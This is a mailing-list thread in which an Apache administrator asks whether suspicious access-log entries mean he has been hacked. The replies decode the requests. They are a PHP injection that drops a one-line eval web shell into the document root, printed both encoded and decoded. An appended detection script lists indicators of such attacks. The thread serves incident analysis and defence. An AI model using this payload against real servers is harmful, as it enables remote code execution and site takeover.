If you have Python installed... The following Python script shows some simple commands for decoding (for future reference).

test ="""
/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME
> NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
> HTTP/1.1" 200 90"""
import urllib.parse
# URL-decode the percent-encoded request lines
print(urllib.parse.unquote(test))
import base64
# Decode the string that the request passes to base64_decode()
print(base64.b64decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'))

********************************************************
It yields...

python unquote.py

/?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME
> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
> HTTP/1.1" 200 90
> 91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET
> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo '->|';file_put_contents($_SERVER['DOCUME
> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';
> HTTP/1.1" 200 90
b'<?php eval($_POST[1]);?>'

********************************************************
I also have a program that attempts to get an email address to notify in the event of abuse. It yields the following.

python getAbuseEmail.py 91.200.12.33
['noc@xxxxxxxxxxxx']

though it is unlikely you'll get a response ;-)

On 2/6/2017 8:36 AM, Jack Swan wrote:
I didn't decode it all. I'll leave the rest up to you, but the %characters are hexadecimal characters. Look up hex charset. So the first line translates to (I may have missed a char or two...)

GET/?1=@ini_set("display_errors", 0);set_time_limit("0");@set_magic_quotes_runtime();echo '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';

----- Original Message -----
From: bernd.lentes@xxxxxxxxxxxxxxxxxxxxx
To: users@xxxxxxxxxxxxxxxx
Sent: Monday, February 6, 2017 11:15:04 AM GMT -05:00 US/Canada Eastern
Subject: am i hacked ?

Hi,

just in the moment I found two very weird entries in my access_log:

91.200.12.33 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90

91.200.12.33 - - [06/Feb/2017:16:44:33 +0100] 253 "GET /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUME NT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.1" 200 90

What upsets me is that these two requests have status code 200, which means it was successful. The IP is from Ukraine.
Where can I find out what these %characters mean? Does anyone understand what happened here?
It's Apache 2.2.3 64bit.

Thanks for any hint.

Bernd
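
Added example, not part of the original thread or written by its participants: the two decoding steps from the top reply applied to a whole access log. It URL-decodes each request, decodes any string passed to base64_decode(), and reports the path handed to file_put_contents(). The log layout regex, the indicator list and the sample lines (with a documentation IP address) are assumptions constructed for illustration.

```python
import base64
import re
from urllib.parse import quote, unquote

# Assumed layout, matching the entries in the thread: combined-style log with
# one extra field between the timestamp and the quoted request.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] (?:\S+ )?'
                    r'"(?P<method>[A-Z]+) (?P<target>.*) HTTP/[\d.]+" (?P<status>\d{3}) ')
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
WRITE_CALL = re.compile(r"file_put_contents\(\s*(.+?)\s*,")
# Illustrative indicator list, not exhaustive.
INDICATORS = ("eval(", "file_put_contents(", "base64_decode(", "$_POST", "ini_set(")

def analyze(line):
    """Return details of a PHP injection attempt in one log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote(m["target"])
    payloads = []
    for blob in B64_CALL.findall(decoded):
        try:
            payloads.append(base64.b64decode(blob, validate=True).decode("utf-8", "replace"))
        except ValueError:  # malformed base64: record it rather than abort the scan
            payloads.append("<undecodable>")
    text = " ".join([decoded, *payloads])
    hits = [i for i in INDICATORS if i in text]
    if not hits:
        return None
    return {"ip": m["ip"], "time": m["ts"], "status": int(m["status"]),
            "decoded": decoded, "payloads": payloads, "indicators": hits,
            "written_to": WRITE_CALL.findall(decoded)}

# Constructed sample lines (documentation IP); the request is modelled on the thread's.
PHP_REQUEST = ("file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',"
               "base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));")
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Feb/2017:16:40:00 +0100] 120 "GET /index.html HTTP/1.1" 200 512',
    '203.0.113.5 - - [06/Feb/2017:16:43:26 +0100] 236 "GET /?1=' + quote(PHP_REQUEST, safe="")
    + ' HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        finding = analyze(entry)
        if finding:
            print(finding["ip"], finding["time"], "status", finding["status"])
            print("  indicators:", ", ".join(finding["indicators"]))
            print("  decoded payloads:", finding["payloads"])
            print("  check whether this file exists:", finding["written_to"])
```

A 200 on such a request only shows that the server returned a page for `/`; whether the file named in `written_to` exists under the document root is the more telling check.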